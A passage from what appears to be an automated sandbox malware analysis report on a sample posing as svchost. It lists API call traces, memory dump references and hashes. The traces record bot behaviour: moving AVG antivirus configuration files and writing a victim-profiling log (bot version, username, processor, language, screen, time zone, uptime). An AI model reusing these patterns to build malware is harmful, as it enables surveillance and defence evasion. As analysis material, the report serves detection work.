                                                                                                                                                                                                              • MoveFileA.KERNEL32(?,?), ref: 0040252F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileFolderMovePath
                                                                                                                                                                                                              • String ID: \AVG\AVG9\dfmcfg.dat$\AVG\AVG9\dfncfg.dat
                                                                                                                                                                                                              • API String ID: 1404575960-1083204512
                                                                                                                                                                                                              • Opcode ID: a6917f6e4da9773d44f84d015a9f77c9b7ba1530eaea60a7d0f67c0c1847faf1
                                                                                                                                                                                                              • Instruction ID: 6a3b38723654ace9b65cd78b9e90850702c138762b68f8666c7e3f81cfb55a8f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a6917f6e4da9773d44f84d015a9f77c9b7ba1530eaea60a7d0f67c0c1847faf1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 35215EB45042448FC719DF14EA98B92BBE1FB89300F1581B9DA88A73B2D6B0D944CF98
                                                                                                                                                                                                              Function 02CB4980 Relevance: 6.1, APIs: 4, Instructions: 55timeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,76ECFFB0,?,?,?,?,?,02CA7967,00000000,?,00000000), ref: 02CB49AD
                                                                                                                                                                                                              • GetProcessTimes.KERNEL32(00000000,?,?,?,02CA7967,?,?,?,?,?,02CA7967,00000000,?,00000000), ref: 02CB49CA
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,02CA7967,00000000,?,00000000), ref: 02CB49E2
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,02CA7967,00000000), ref: 02CB49F3
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleProcess$CloseInformationOpenTimes
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3228293703-0
                                                                                                                                                                                                              • Opcode ID: c7f254cdee3376b772cf3f54225ce1d401f00077be12c7d5e0a56f6b714a289b
                                                                                                                                                                                                              • Instruction ID: ca3e15548ec4f4aaa993eeada8c499cd99cf4c0d3223c259fc8019a643b24b22
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c7f254cdee3376b772cf3f54225ce1d401f00077be12c7d5e0a56f6b714a289b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DF111CB2D01219ABCB159F9AC8849EFFBFCFF98244F50814AE905E7101D770AA45CBA0
                                                                                                                                                                                                              Function 02CA77C0 Relevance: 6.0, APIs: 4, Instructions: 27threadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CA6CA0,00000000,00000000,00000000), ref: 02CA77D4
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CA77EC
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA77FD
                                                                                                                                                                                                              • ExitThread.KERNEL32 ref: 02CA7805
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleThread$CloseCreateExitInformation
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4233414108-0
                                                                                                                                                                                                              • Opcode ID: 21d21a51202f1c55e417e20eacf72d84b3f3f171f918724bd02f271d3c9ec737
                                                                                                                                                                                                              • Instruction ID: 1d5c8aaead2b60c1a93907ae8cc9c60176eb71ae99dde19cea43576f24f876d3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 21d21a51202f1c55e417e20eacf72d84b3f3f171f918724bd02f271d3c9ec737
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 60E09230A86315BBF7215B90CD0EF6E7AACAF00B89FA40114FA00FA0C0D7E06B05C6A5
                                                                                                                                                                                                              Function 02CA4A30 Relevance: 5.1, APIs: 4, Instructions: 54memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02C96C70: memset.MSVCRT ref: 02C96CA1
                                                                                                                                                                                                                • Part of subcall function 02C96C70: memset.MSVCRT ref: 02C96CBF
                                                                                                                                                                                                                • Part of subcall function 02C96C70: RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?,?,?,?,?,?,00000000), ref: 02C96CDB
                                                                                                                                                                                                                • Part of subcall function 02C96C70: RegQueryValueExA.KERNEL32(?,5DD2BAAFa,00000000,00000001,?,00000104,?,?,?,?,?,00000000), ref: 02C96D02
                                                                                                                                                                                                                • Part of subcall function 02C96C70: GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02C96D7A
                                                                                                                                                                                                                • Part of subcall function 02C96C70: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02C96D81
                                                                                                                                                                                                                • Part of subcall function 02C96C70: memset.MSVCRT ref: 02C96D95
                                                                                                                                                                                                                • Part of subcall function 02C96C70: lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02C96DAE
                                                                                                                                                                                                                • Part of subcall function 02C96C70: RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000000), ref: 02C96DBC
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,74DF0F10,00000000,02CAA2D3), ref: 02CA4A88
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CA4A8B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02CA4A98
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CA4A9B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Processmemset$AllocCloseFreeOpenQueryValidateValuelstrcpyn
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 789118668-0
                                                                                                                                                                                                              • Opcode ID: 667f668ef363b875d2350915e70736ca7a4ce26a7a4a5140b8ec66f73c6e1333
                                                                                                                                                                                                              • Instruction ID: 580f016d4659280ad127dccb156d2fc9cab60d16282ea0b59ab4ada6afbd4b04
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 667f668ef363b875d2350915e70736ca7a4ce26a7a4a5140b8ec66f73c6e1333
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 69017B71BC62425ADF385A78693073AAB9EDFC2198B4C0369E847C7284E7B1CC00A354
                                                                                                                                                                                                              Function 02CAA4F0 Relevance: 4.5, APIs: 3, Instructions: 24threadmemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 02CAA4FE
                                                                                                                                                                                                              • SetThreadPriority.KERNEL32(00000000), ref: 02CAA505
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(02CAA660,00000008,00000000,02CAA660), ref: 02CAA51F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Thread$CurrentPriorityProtectVirtual
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1494777729-0
                                                                                                                                                                                                              • Opcode ID: e570a564f5be4d66ea2b3e1cadb02ff5f86b3ccc4bb6944103dbe23402076070
                                                                                                                                                                                                              • Instruction ID: 55e90ef56e1be1830d283650159666ab70a69d4b58cf5d84e54965a8ded19298
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e570a564f5be4d66ea2b3e1cadb02ff5f86b3ccc4bb6944103dbe23402076070
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FCE030B6E402189BCF00DFD8D845A9DB778FB48320F00864AF914E7240C67498108B60
                                                                                                                                                                                                              Function 0040219A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 004021AC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                                              • String ID: v-@
                                                                                                                                                                                                              • API String ID: 3664257935-4190885519
                                                                                                                                                                                                              • Opcode ID: b8aa73b41344c928b5a69aeafce1e5ea70d40f485a6ee08f666cda2b661d009f
                                                                                                                                                                                                              • Instruction ID: 659d1c44b33988b11b994a6559d152e96ecfdb185b9268fc6ed29e1105b0769f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b8aa73b41344c928b5a69aeafce1e5ea70d40f485a6ee08f666cda2b661d009f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 34D05E76E01629CBCB21DF94A5052AEF730FB44731F0043AADE247338083351C118AD5

                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                              Function 02C94B00 Relevance: 325.1, APIs: 164, Strings: 21, Instructions: 1343filetimeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000,?,02CED3A4,75B05CE0), ref: 02C94C37
                                                                                                                                                                                                                • Part of subcall function 02CB59D0: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02CB59EE
                                                                                                                                                                                                                • Part of subcall function 02CB59D0: GetSecurityDescriptorSacl.ADVAPI32(?,?,00000001,02C95DE8,?,?,02C95DE8,?,00000001), ref: 02CB5A0B
                                                                                                                                                                                                                • Part of subcall function 02CB59D0: SetNamedSecurityInfoA.ADVAPI32(?,02C95DE8,00000010,00000000,00000000,00000000,00000001), ref: 02CB5A26
                                                                                                                                                                                                                • Part of subcall function 02CB59D0: LocalFree.KERNEL32(?,?,?,02C95DE8,?,00000001), ref: 02CB5A37
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,00000001), ref: 02C94C5E
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 02C94C6F
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{BotVer: ,00000009,02C93F9D,00000000), ref: 02C94C7F
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,00000009,00000000), ref: 02C94C90
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C94CA4
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000005,00000000), ref: 02C94CB1
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,4.1.2,00000005,00000000,00000000), ref: 02C94CC1
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,00000005,00000000), ref: 02C94CD2
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C94CE6
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02C94CF3
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02CD5B88,00000002,00000000,00000000), ref: 02C94D03
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,00000002,00000000), ref: 02C94D14
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02C94D28
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C94D3C
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,0000000A,00000000), ref: 02C94D49
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Process: ,0000000A,00000000,00000000), ref: 02C94D59
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,0000000A,00000000), ref: 02C94D6A
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C94D9C
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02C94DAB
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02C94DBF
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02C94DD2
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C94DE6
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02C94DF3
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02CD5B88,00000002,00000000,00000000), ref: 02C94E03
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02C94E14
                                                                                                                                                                                                              • GetUserNameA.ADVAPI32(?,00000104), ref: 02C94E25
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C94E39
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,0000000B,00000000), ref: 02C94E46
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Username: ,0000000B,00000000,00000000), ref: 02C94E56
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000B,00000000), ref: 02C94E67
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C94E92
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02C94EA1
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02C94EB5
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02C94EC8
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C94EDC
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02C94EE9
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02CD5B88,00000002,00000000,00000000), ref: 02C94EF9
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02C94F0A
                                                                                                                                                                                                              • GetEnvironmentVariableA.KERNEL32(PROCESSOR_IDENTIFIER,?,00000104), ref: 02C94F21
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C94F35
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02C94F42
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Processor: ,0000000C,00000000,00000000), ref: 02C94F52
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02C94F63
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C94F8E
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02C94F9D
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02C94FB1
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02C94FC4
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C94FD8
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02C94FE5
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02CD5B88,00000002,00000000,00000000), ref: 02C94FF5
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02C95006
                                                                                                                                                                                                              • GetSystemDefaultLangID.KERNEL32 ref: 02C9500C
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C95026
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C95093
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,0000000B,00000000), ref: 02C950A0
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Language: ,0000000B,00000000,00000000), ref: 02C950B0
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000B,00000000), ref: 02C950C1
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C950EC
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02C950FB
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02C9510F
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02C95122
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C95136
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02C95143
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02CD5B88,00000002,00000000,00000000), ref: 02C95153
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02C95164
                                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 02C9516E
                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000), ref: 02C95175
                                                                                                                                                                                                              • GetSystemMetrics.USER32(00000001), ref: 02C9517E
                                                                                                                                                                                                              • GetSystemMetrics.USER32(00000000), ref: 02C95187
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02C9519F
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C951B6
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 02C951C3
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Screen: ,00000009,00000000,00000000), ref: 02C951D3
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 02C951E4
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C9520F
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02C9521E
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02C95232
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02C95245
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C95259
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02C95266
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02CD5B88,00000002,00000000,00000000), ref: 02C95276
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02C95287
                                                                                                                                                                                                              • GetDateFormatA.KERNEL32(00000409,00000000,00000000,dd:MMM:yyyy,?,00000104), ref: 02C952A7
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C952BB
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000007,00000000), ref: 02C952C8
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Date: ,00000007,00000000,00000000), ref: 02C952D8
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000007,00000000), ref: 02C952E9
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C95314
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02C95323
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02C95337
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02C9534A
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C9535E
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02C9536B
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02CD5B88,00000002,00000000,00000000), ref: 02C9537B
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02C9538C
                                                                                                                                                                                                              • GetTimeFormatA.KERNEL32(00000409,00000000,00000000,HH:mm:ss,?,00000104), ref: 02C953AC
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C953C0
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,0000000D,00000000), ref: 02C953CD
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Local time: ,0000000D,00000000,00000000), ref: 02C953DD
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000D,00000000), ref: 02C953EE
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C9541C
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02C9542B
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02C9543F
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02C95452
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C95466
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02C95473
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02CD5B88,00000002,00000000,00000000), ref: 02C95483
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02C95494
                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?), ref: 02C954A1
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02C95502
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C95519
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000006,00000000), ref: 02C95526
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{GMT: ,00000006,00000000,00000000), ref: 02C95536
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000006,00000000), ref: 02C95547
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C95572
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02C95581
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02C95595
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02C955A8
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C955BC
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02C955C9
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02CD5B88,00000002,00000000,00000000), ref: 02C955D9
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02C955EA
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C955FE
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 02C9560B
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Uptime: ,00000009,00000000,00000000), ref: 02C9561B
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 02C9562C
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C9566C
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02C9567B
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02C9568C
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 02C9569F
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C956B3
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02C956C0
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02CD5B88,00000002,00000000,00000000), ref: 02C956D0
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02C956E1
                                                                                                                                                                                                              • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 02C956F3
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C95707
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000014,00000000), ref: 02C95714
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Windows directory: ,00000014,00000000,00000000), ref: 02C95724
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000014,00000000), ref: 02C95735
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C95760
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02C9576F
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02C95783
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02C95796
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C957AA
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02C957B7
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02CD5B88,00000002,00000000,00000000), ref: 02C957C7
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02C957D8
